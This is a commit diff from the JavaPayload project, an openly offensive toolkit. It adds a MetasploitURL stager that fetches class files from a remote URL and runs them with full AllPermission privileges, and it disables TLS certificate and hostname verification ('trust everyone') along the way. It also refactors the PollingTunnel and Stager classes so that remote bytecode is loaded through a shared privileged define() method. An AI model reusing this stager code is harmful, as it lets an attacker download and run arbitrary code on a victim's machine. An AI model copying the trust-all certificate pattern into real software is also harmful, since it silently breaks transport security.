+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stager;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.net.URL;
+import java.net.URLConnection;
+import java.security.cert.X509Certificate;
+
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+
+// only useful when used with a Metasploit multi/handler
+public class MetasploitURL extends Stager implements X509TrustManager, HostnameVerifier {
+
+ public void bootstrap(String[] parameters, boolean needWait) throws Exception {
+ String url = parameters[1];
+ InputStream in;
+ if (url.startsWith("raw:")) {
+ // for debugging: just use raw bytes from property file
+ in = new ByteArrayInputStream(url.substring(4).getBytes("ISO-8859-1"));
+ } else if (url.startsWith("call:")) {
+ in = (InputStream) Class.forName(url.substring(5)).getMethod("getIn", null).invoke(null, null);
+ } else if (url.startsWith("https:")) {
+ URLConnection uc = new URL(url).openConnection();
+ if (uc instanceof HttpsURLConnection) {
+ HttpsURLConnection huc = ((HttpsURLConnection) uc);
+ SSLContext sc = SSLContext.getInstance("SSL");
+ sc.init(null, new TrustManager[] { this }, new java.security.SecureRandom());
+ huc.setSSLSocketFactory(sc.getSocketFactory());
+ huc.setHostnameVerifier(this);
+ }
+ in = uc.getInputStream();
+ } else {
+ in = new URL(url).openStream();
+ }
+ bootstrap(in, new ByteArrayOutputStream(), parameters);
+ }
+
+ public void waitReady() throws InterruptedException {
+ }
+
+ public X509Certificate[] getAcceptedIssuers() {
+ // no preferred issuers
+ return new X509Certificate[0];
+ }
+
+ public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public boolean verify(String hostname, SSLSession session) {
+ // trust everyone
+ return true;
+ }
+}
7 JavaPayload/src/javapayload/stager/PollingTunnel.java
View
@@ -39,12 +39,8 @@
import java.io.OutputStream;
import java.io.PipedInputStream;
import java.io.PipedOutputStream;
-import java.net.URL;
import java.security.AllPermission;
-import java.security.CodeSource;
import java.security.Permissions;
-import java.security.ProtectionDomain;
-import java.security.cert.Certificate;
public class PollingTunnel extends Stager implements Runnable {
@@ -142,9 +138,8 @@ public String sendData(String data) throws IOException {
byte[] classfile = decodeASCII85(data.substring(1));
final Permissions permissions = new Permissions();
permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
synchronized(this) {
- resolveClass(wposClass = defineClass(null, classfile, 0, classfile.length, pd));
+ resolveClass(wposClass = define(classfile));
notifyAll();
}
return "9";
15 JavaPayload/src/javapayload/stager/Stager.java
View
@@ -35,6 +35,7 @@
package javapayload.stager;
import java.io.DataInputStream;
+import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
@@ -51,14 +52,11 @@ protected final void bootstrap(InputStream rawIn, OutputStream out, String[] par
try {
final DataInputStream in = new DataInputStream(rawIn);
Class clazz;
- final Permissions permissions = new Permissions();
- permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
int length = in.readInt();
do {
final byte[] classfile = new byte[length];
in.readFully(classfile);
- resolveClass(clazz = defineClass(null, classfile, 0, length, pd));
+ clazz = define(classfile);
length = in.readInt();
if (length == 0) {
break;
@@ -70,6 +68,15 @@ protected final void bootstrap(InputStream rawIn, OutputStream out, String[] par
t.printStackTrace(new PrintStream(out, true));
}
}
+
+ protected final Class define(byte[] classfile) throws IOException {
+ final Permissions permissions = new Permissions();
+ permissions.add(new AllPermission());
+ final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
+ Class clazz = defineClass(null, classfile, 0, classfile.length, pd);
+ resolveClass(clazz);
+ return clazz;
+ }
public abstract void bootstrap(String[] parameters, boolean needWait) throws Exception;
public abstract void waitReady() throws InterruptedException;
Please sign in to comment.
Something went wrong with that request. Please try again.